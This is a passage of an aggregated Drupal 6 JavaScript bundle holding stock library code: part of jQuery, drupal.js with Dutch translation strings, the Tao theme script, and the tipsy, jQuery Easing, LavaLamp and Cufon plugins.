G=this.offsetParent(),J=this.offset(),E=/^body|html$/i.test(G[0].tagName)?{top:0,left:0}:G.offset();J.top-=j(this,"marginTop");J.left-=j(this,"marginLeft");E.top+=j(G,"borderTopWidth");E.left+=j(G,"borderLeftWidth");F={top:J.top-E.top,left:J.left-E.left}}return F},offsetParent:function(){var E=this[0].offsetParent||document.body;while(E&&(!/^body|html$/i.test(E.tagName)&&o.css(E,"position")=="static")){E=E.offsetParent}return o(E)}});o.each(["Left","Top"],function(F,E){var G="scroll"+E;o.fn[G]=function(H){if(!this[0]){return null}return H!==g?this.each(function(){this==l||this==document?l.scrollTo(!F?H:o(l).scrollLeft(),F?H:o(l).scrollTop()):this[G]=H}):this[0]==l||this[0]==document?self[F?"pageYOffset":"pageXOffset"]||o.boxModel&&document.documentElement[G]||document.body[G]:this[0][G]}});o.each(["Height","Width"],function(I,G){var E=I?"Left":"Top",H=I?"Right":"Bottom",F=G.toLowerCase();o.fn["inner"+G]=function(){return this[0]?o.css(this[0],F,false,"padding"):null};o.fn["outer"+G]=function(K){return this[0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();;
// $Id: drupal.js,v 1.41.2.4 2009/07/21 08:59:10 goba Exp $

var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} };

/**
 * Set the variable that indicates if JavaScript behaviors should be applied
 */
Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById;

/**
 * Attach all registered behaviors to a page element.
 *
 * Behaviors are event-triggered actions that attach to page elements, enhancing
 * default non-Javascript UIs. Behaviors are registered in the Drupal.behaviors
 * object as follows:
 * @code
 *    Drupal.behaviors.behaviorName = function () {
 *      ...
 *    };
 * @endcode
 *
 * Drupal.attachBehaviors is added below to the jQuery ready event and so
 * runs on initial page load. Developers implementing AHAH/AJAX in their
 * solutions should also call this function after new page content has been
 * loaded, feeding in an element to be processed, in order to attach all
 * behaviors to the new content.
 *
 * Behaviors should use a class in the form behaviorName-processed to ensure
 * the behavior is attached only once to a given element. (Doing so enables
 * the reprocessing of given elements, which may be needed on occasion despite
 * the ability to limit behavior attachment to a particular element.)
 *
 * @param context
 *   An element to attach behaviors to. If none is given, the document element
 *   is used.
 */
Drupal.attachBehaviors = function(context) {
  context = context || document;
  if (Drupal.jsEnabled) {
    // Execute all of them.
    jQuery.each(Drupal.behaviors, function() {
      this(context);
    });
  }
};

/**
 * Encode special characters in a plain-text string for display as HTML.
 */
Drupal.checkPlain = function(str) {
  str = String(str);
  var replace = { '&': '&amp;', '"': '&quot;', '<': '&lt;', '>': '&gt;' };
  for (var character in replace) {
    var regex = new RegExp(character, 'g');
    str = str.replace(regex, replace[character]);
  }
  return str;
};

/**
 * Translate strings to the page language or a given language.
 *
 * See the documentation of the server-side t() function for further details.
 *
 * @param str
 *   A string containing the English string to translate.
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 * @return
 *   The translated string.
 */
Drupal.t = function(str, args) {
  // Fetch the localized version of the string.
  if (Drupal.locale.strings && Drupal.locale.strings[str]) {
    str = Drupal.locale.strings[str];
  }

  if (args) {
    // Transform arguments before inserting them
    for (var key in args) {
      switch (key.charAt(0)) {
        // Escaped only
        case '@':
          args[key] = Drupal.checkPlain(args[key]);
        break;
        // Pass-through
        case '!':
          break;
        // Escaped and placeholder
        case '%':
        default:
          args[key] = Drupal.theme('placeholder', args[key]);
          break;
      }
      str = str.replace(key, args[key]);
    }
  }
  return str;
};

/**
 * Format a string containing a count of items.
 *
 * This function ensures that the string is pluralized correctly. Since Drupal.t() is
 * called by this function, make sure not to pass already-localized strings to it.
 *
 * See the documentation of the server-side format_plural() function for further details.
 *
 * @param count
 *   The item count to display.
 * @param singular
 *   The string for the singular case. Please make sure it is clear this is
 *   singular, to ease translation (e.g. use "1 new comment" instead of "1 new").
 *   Do not use @count in the singular string.
 * @param plural
 *   The string for the plural case. Please make sure it is clear this is plural,
 *   to ease translation. Use @count in place of the item count, as in "@count
 *   new comments".
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 *   Note that you do not need to include @count in this array.
 *   This replacement is done automatically for the plural case.
 * @return
 *   A translated string.
 */
Drupal.formatPlural = function(count, singular, plural, args) {
  var args = args || {};
  args['@count'] = count;
  // Determine the index of the plural form.
  var index = Drupal.locale.pluralFormula ? Drupal.locale.pluralFormula(args['@count']) : ((args['@count'] == 1) ? 0 : 1);

  if (index == 0) {
    return Drupal.t(singular, args);
  }
  else if (index == 1) {
    return Drupal.t(plural, args);
  }
  else {
    args['@count['+ index +']'] = args['@count'];
    delete args['@count'];
    return Drupal.t(plural.replace('@count', '@count['+ index +']'));
  }
};

/**
 * Generate the themed representation of a Drupal object.
 *
 * All requests for themed output must go through this function. It examines
 * the request and routes it to the appropriate theme function. If the current
 * theme does not provide an override function, the generic theme function is
 * called.
 *
 * For example, to retrieve the HTML that is output by theme_placeholder(text),
 * call Drupal.theme('placeholder', text).
 *
 * @param func
 *   The name of the theme function to call.
 * @param ...
 *   Additional arguments to pass along to the theme function.
 * @return
 *   Any data the theme function returns. This could be a plain HTML string,
 *   but also a complex object.
 */
Drupal.theme = function(func) {
  for (var i = 1, args = []; i < arguments.length; i++) {
    args.push(arguments[i]);
  }

  return (Drupal.theme[func] || Drupal.theme.prototype[func]).apply(this, args);
};

/**
 * Parse a JSON response.
 *
 * The result is either the JSON object, or an object with 'status' 0 and 'data' an error message.
 */
Drupal.parseJson = function (data) {
  if ((data.substring(0, 1) != '{') && (data.substring(0, 1) != '[')) {
    return { status: 0, data: data.length ? data : Drupal.t('Unspecified error') };
  }
  return eval('(' + data + ');');
};

/**
 * Freeze the current body height (as minimum height). Used to prevent
 * unnecessary upwards scrolling when doing DOM manipulations.
 */
Drupal.freezeHeight = function () {
  Drupal.unfreezeHeight();
  var div = document.createElement('div');
  $(div).css({
    position: 'absolute',
    top: '0px',
    left: '0px',
    width: '1px',
    height: $('body').css('height')
  }).attr('id', 'freeze-height');
  $('body').append(div);
};

/**
 * Unfreeze the body height
 */
Drupal.unfreezeHeight = function () {
  $('#freeze-height').remove();
};

/**
 * Wrapper around encodeURIComponent() which avoids Apache quirks (equivalent of
 * drupal_urlencode() in PHP). This function should only be used on paths, not
 * on query string arguments.
 */
Drupal.encodeURIComponent = function (item, uri) {
  uri = uri || location.href;
  item = encodeURIComponent(item).replace(/%2F/g, '/');
  return (uri.indexOf('?q=') != -1) ? item : item.replace(/%26/g, '%2526').replace(/%23/g, '%2523').replace(/\/\//g, '/%252F');
};

/**
 * Get the text selection in a textarea.
 */
Drupal.getSelection = function (element) {
  if (typeof(element.selectionStart) != 'number' && document.selection) {
    // The current selection
    var range1 = document.selection.createRange();
    var range2 = range1.duplicate();
    // Select all text.
    range2.moveToElementText(element);
    // Now move 'dummy' end point to end point of original range.
    range2.setEndPoint('EndToEnd', range1);
    // Now we can calculate start and end points.
    var start = range2.text.length - range1.text.length;
    var end = start + range1.text.length;
    return { 'start': start, 'end': end };
  }
  return { 'start': element.selectionStart, 'end': element.selectionEnd };
};

/**
 * Build an error message from ahah response.
 */
Drupal.ahahError = function(xmlhttp, uri) {
  if (xmlhttp.status == 200) {
    if (jQuery.trim($(xmlhttp.responseText).text())) {
      var message = Drupal.t("An error occurred. \n@uri\n@text", {'@uri': uri, '@text': xmlhttp.responseText });
    }
    else {
      var message = Drupal.t("An error occurred. \n@uri\n(no information available).", {'@uri': uri, '@text': xmlhttp.responseText });
    }
  }
  else {
    var message = Drupal.t("An HTTP error @status occurred. \n@uri", {'@uri': uri, '@status': xmlhttp.status });
  }
  return message;
}

// Global Killswitch on the <html> element
if (Drupal.jsEnabled) {
  // Global Killswitch on the <html> element
  $(document.documentElement).addClass('js');
  // 'js enabled' cookie
  document.cookie = 'has_js=1; path=/';
  // Attach all behaviors.
  $(document).ready(function() {
    Drupal.attachBehaviors(this);
  });
}

/**
 * The default themes.
 */
Drupal.theme.prototype = {

  /**
   * Formats text for emphasized display in a placeholder inside a sentence.
   *
   * @param str
   *   The text to format (plain-text).
   * @return
   *   The formatted text (html).
   */
  placeholder: function(str) {
    return '<em>' + Drupal.checkPlain(str) + '</em>';
  }
};
;
Drupal.locale = { 'pluralFormula': function($n) { return Number(($n!=1)); }, 'strings': { "Save": "Opslaan", "Select all rows in this table": "Selecteer alle regels van deze tabel", "Deselect all rows in this table": "De-selecteer alle regels van deze tabel", "Join summary": "Samenvatting samenvoegen", "Split summary at cursor": "Splits de samenvatting op de cursorpositie", "Drag to re-order": "Slepen om de volgorde te wijzigen", "Changes made in this table will not be saved until the form is submitted.": "Wijzigingen in deze tabel worden pas opgeslagen wanneer het formulier wordt ingediend.", "Unspecified error": "Onbekend probleem", "The changes to these blocks will not be saved until the \x3cem\x3eSave blocks\x3c/em\x3e button is clicked.": "Wijzigingen aan de blokken worden pas opgeslagen wanneer u de knop \x3cem\x3eBlokken opslaan\x3c/em\x3e aanklikt.", "The selected file %filename cannot be uploaded. Only files with the following extensions are allowed: %extensions.": "Het geselecteerde bestand %filename kan niet worden geupload. Alleen bestanden met volgende extensies zijn toegestaan: %extensions.", "Automatic alias": "Automatische alias", "Save and send": "Opslaan en verzenden", "Save and send test": "Opslaan en test verzenden" } };;
// $Id: tao.js,v 1.1.2.1 2010/09/28 19:39:45 yhahn Exp $

Drupal.behaviors.tao = function (context) {
  $('fieldset.collapsible:not(.tao-processed) > legend > .fieldset-title').each(function() {
    var fieldset = $(this).parents('fieldset').eq(0);
    fieldset.addClass('tao-processed');

    // Expand any fieldsets containing errors.
    if ($('input.error, textarea.error, select.error', fieldset).size() > 0) {
      $(fieldset).removeClass('collapsed');
    }

    // Add a click handler for toggling fieldset state.
    $(this).click(function() {
      if (fieldset.is('.collapsed')) {
        $(fieldset).removeClass('collapsed').children('.fieldset-content').show();
      }
      else {
        $(fieldset).addClass('collapsed').children('.fieldset-content').hide();
      }
      return false;
    });
  });
};
;
(function($) {
    $.fn.tipsy = function(options) {

        options = $.extend({}, $.fn.tipsy.defaults, options);
        
        return this.each(function() {
            
            var opts = $.fn.tipsy.elementOptions(this, options);
            
            $(this).hover(function() {

                $.data(this, 'cancel.tipsy', true);

                var tip = $.data(this, 'active.tipsy');
                if (!tip) {
                    tip = $('<div class="tipsy"><div class="tipsy-inner"/></div>');
                    tip.css({position: 'absolute', zIndex: 100000});
                    $.data(this, 'active.tipsy', tip);
                }

                if ($(this).attr('title') || typeof($(this).attr('original-title')) != 'string') {
                    $(this).attr('original-title', $(this).attr('title') || '').removeAttr('title');
                }

                var title;
                if (typeof opts.title == 'string') {
                    title = $(this).attr(opts.title == 'title' ? 'original-title' : opts.title);
                } else if (typeof opts.title == 'function') {
                    title = opts.title.call(this);
                }

                tip.find('.tipsy-inner')[opts.html ? 'html' : 'text'](title || opts.fallback);

                var pos = $.extend({}, $(this).offset(), {width: this.offsetWidth, height: this.offsetHeight});
                tip.get(0).className = 'tipsy'; // reset classname in case of dynamic gravity
                tip.remove().css({top: 0, left: 0, visibility: 'hidden', display: 'block'}).appendTo(document.body);
                var actualWidth = tip[0].offsetWidth, actualHeight = tip[0].offsetHeight;
                var gravity = (typeof opts.gravity == 'function') ? opts.gravity.call(this) : opts.gravity;

                switch (gravity.charAt(0)) {
                    case 'n':
                        tip.css({top: pos.top + pos.height, left: pos.left + pos.width / 2 - actualWidth / 2}).addClass('tipsy-north');
                        break;
                    case 's':
                        tip.css({top: pos.top - actualHeight, left: pos.left + pos.width / 2 - actualWidth / 2}).addClass('tipsy-south');
                        break;
                    case 'e':
                        tip.css({top: pos.top + pos.height / 2 - actualHeight / 2, left: pos.left - actualWidth}).addClass('tipsy-east');
                        break;
                    case 'w':
                        tip.css({top: pos.top + pos.height / 2 - actualHeight / 2, left: pos.left + pos.width}).addClass('tipsy-west');
                        break;
                }

                if (opts.fade) {
                    tip.css({opacity: 0, display: 'block', visibility: 'visible'}).animate({opacity: 0.8});
                } else {
                    tip.css({visibility: 'visible'});
                }

            }, function() {
                $.data(this, 'cancel.tipsy', false);
                var self = this;
                setTimeout(function() {
                    if ($.data(this, 'cancel.tipsy')) return;
                    var tip = $.data(self, 'active.tipsy');
                    if (opts.fade) {
                        tip.stop().fadeOut(function() { $(this).remove(); });
                    } else {
                        tip.remove();
                    }
                }, 100);

            });
            
        });
        
    };
    
    // Overwrite this method to provide options on a per-element basis.
    // For example, you could store the gravity in a 'tipsy-gravity' attribute:
    // return $.extend({}, options, {gravity: $(ele).attr('tipsy-gravity') || 'n' });
    // (remember - do not modify 'options' in place!)
    $.fn.tipsy.elementOptions = function(ele, options) {
        return $.metadata ? $.extend({}, options, $(ele).metadata()) : options;
    };
    
    $.fn.tipsy.defaults = {
        fade: false,
        fallback: '',
        gravity: 'n',
        html: false,
        title: 'title'
    };
    
    $.fn.tipsy.autoNS = function() {
        return $(this).offset().top > ($(document).scrollTop() + $(window).height() / 2) ? 's' : 'n';
    };
    
    $.fn.tipsy.autoWE = function() {
        return $(this).offset().left > ($(document).scrollLeft() + $(window).width() / 2) ? 'e' : 'w';
    };
    
})(jQuery);
;
/*
 * jQuery Easing v1.1 - http://gsgd.co.uk/sandbox/jquery.easing.php
 *
 * Uses the built in easing capabilities added in jQuery 1.1
 * to offer multiple easing options
 *
 * Copyright (c) 2007 George Smith
 * Licensed under the MIT License:
 *   http://www.opensource.org/licenses/mit-license.php
 */

jQuery.easing = {
	easein: function(x, t, b, c, d) {
		return c*(t/=d)*t + b; // in
	},
	easeinout: function(x, t, b, c, d) {
		if (t < d/2) return 2*c*t*t/(d*d) + b;
		var ts = t - d/2;
		return -2*c*ts*ts/(d*d) + 2*c*ts/d + c/2 + b;		
	},
	easeout: function(x, t, b, c, d) {
		return -c*t*t/(d*d) + 2*c*t/d + b;
	},
	expoin: function(x, t, b, c, d) {
		var flip = 1;
		if (c < 0) {
			flip *= -1;
			c *= -1;
		}
		return flip * (Math.exp(Math.log(c)/d * t)) + b;		
	},
	expoout: function(x, t, b, c, d) {
		var flip = 1;
		if (c < 0) {
			flip *= -1;
			c *= -1;
		}
		return flip * (-Math.exp(-Math.log(c)/d * (t-d)) + c + 1) + b;
	},
	expoinout: function(x, t, b, c, d) {
		var flip = 1;
		if (c < 0) {
			flip *= -1;
			c *= -1;
		}
		if (t < d/2) return flip * (Math.exp(Math.log(c/2)/(d/2) * t)) + b;
		return flip * (-Math.exp(-2*Math.log(c/2)/d * (t-d)) + c + 1) + b;
	},
	bouncein: function(x, t, b, c, d) {
		return c - jQuery.easing['bounceout'](x, d-t, 0, c, d) + b;
	},
	bounceout: function(x, t, b, c, d) {
		if ((t/=d) < (1/2.75)) {
			return c*(7.5625*t*t) + b;
		} else if (t < (2/2.75)) {
			return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
		} else if (t < (2.5/2.75)) {
			return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
		} else {
			return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
		}
	},
	bounceinout: function(x, t, b, c, d) {
		if (t < d/2) return jQuery.easing['bouncein'] (x, t*2, 0, c, d) * .5 + b;
		return jQuery.easing['bounceout'] (x, t*2-d,0, c, d) * .5 + c*.5 + b;
	},
	elasin: function(x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d)==1) return b+c;  if (!p) p=d*.3;
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		return -(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
	},
	elasout: function(x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d)==1) return b+c;  if (!p) p=d*.3;
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		return a*Math.pow(2,-10*t) * Math.sin( (t*d-s)*(2*Math.PI)/p ) + c + b;
	},
	elasinout: function(x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d/2)==2) return b+c;  if (!p) p=d*(.3*1.5);
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		if (t < 1) return -.5*(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
		return a*Math.pow(2,-10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )*.5 + c + b;
	},
	backin: function(x, t, b, c, d) {
		var s=1.70158;
		return c*(t/=d)*t*((s+1)*t - s) + b;
	},
	backout: function(x, t, b, c, d) {
		var s=1.70158;
		return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b;
	},
	backinout: function(x, t, b, c, d) {
		var s=1.70158;
		if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b;
		return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b;
	},
	linear: function(x, t, b, c, d) {
		return c*t/d + b; //linear
	}
};;
/**
 * LavaLamp - A menu plugin for jQuery with cool hover effects.
 * @requires jQuery v1.1.3.1 or above
 *
 * http://gmarwaha.com/blog/?p=7
 *
 * Copyright (c) 2007 Ganeshji Marwaha (gmarwaha.com)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 * Version: 0.2.0
 * Requires Jquery 1.2.1 from version 0.2.0 onwards. 
 * For jquery 1.1.x, use version 0.1.0 of lavalamp
 */

/**
 * Creates a menu with an unordered list of menu-items. You can either use the CSS that comes with the plugin, or write your own styles 
 * to create a personalized effect
 *
 * The HTML markup used to build the menu can be as simple as...
 *
 *       <ul class="lavaLamp">
 *           <li><a href="#">Home</a></li>
 *           <li><a href="#">Plant a tree</a></li>
 *           <li><a href="#">Travel</a></li>
 *           <li><a href="#">Ride an elephant</a></li>
 *       </ul>
 *
 * Once you have included the style sheet that comes with the plugin, you will have to include 
 * a reference to jquery library, easing plugin(optional) and the LavaLamp(this) plugin.
 *
 * Use the following snippet to initialize the menu.
 *   $(function() { $(".lavaLamp").lavaLamp({ fx: "backout", speed: 700}) });
 *
 * Thats it. Now you should have a working lavalamp menu. 
 *
 * @param an options object - You can specify all the options shown below as an options object param.
 *
 * @option fx - default is "linear"
 * @example
 * $(".lavaLamp").lavaLamp({ fx: "backout" });
 * @desc Creates a menu with "backout" easing effect. You need to include the easing plugin for this to work.
 *
 * @option speed - default is 500 ms
 * @example
 * $(".lavaLamp").lavaLamp({ speed: 500 });
 * @desc Creates a menu with an animation speed of 500 ms.
 *
 * @option click - no defaults
 * @example
 * $(".lavaLamp").lavaLamp({ click: function(event, menuItem) { return false; } });
 * @desc You can supply a callback to be executed when the menu item is clicked. 
 * The event object and the menu-item that was clicked will be passed in as arguments.
 */
(function($) {
$.fn.lavaLamp = function(o) {
    o = $.extend({ fx: "linear", activeClass: "current", speed: 500, click: function(){} }, o || {});

    return this.each(function() {
        var me = $(this), noop = function(){},
            $back = $('<li class="back"><div class="left"></div></li>').appendTo(me),
            $li = $("li", this), curr = $("li."+o.activeClass, this)[0] || $($li[0]).addClass(o.activeClass)[0];

        $li.not(".back").hover(function() {
            move(this);
        }, noop);

        $(this).hover(noop, function() {
            move(curr);
        });

        $li.click(function(e) {
            setCurr(this);
            return o.click.apply(this, [e, this]);
        });

        setCurr(curr);

        function setCurr(el) {
            $back.css({ "left": el.offsetLeft+"px", "width": el.offsetWidth+"px" });
            curr = el;
        };

        function move(el) {
            $back.each(function() {
                $(this).dequeue(); }
            ).animate({
                width: el.offsetWidth,
                left: el.offsetLeft
            }, o.speed, o.fx);
        };

    });
};
})(jQuery);
;
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var 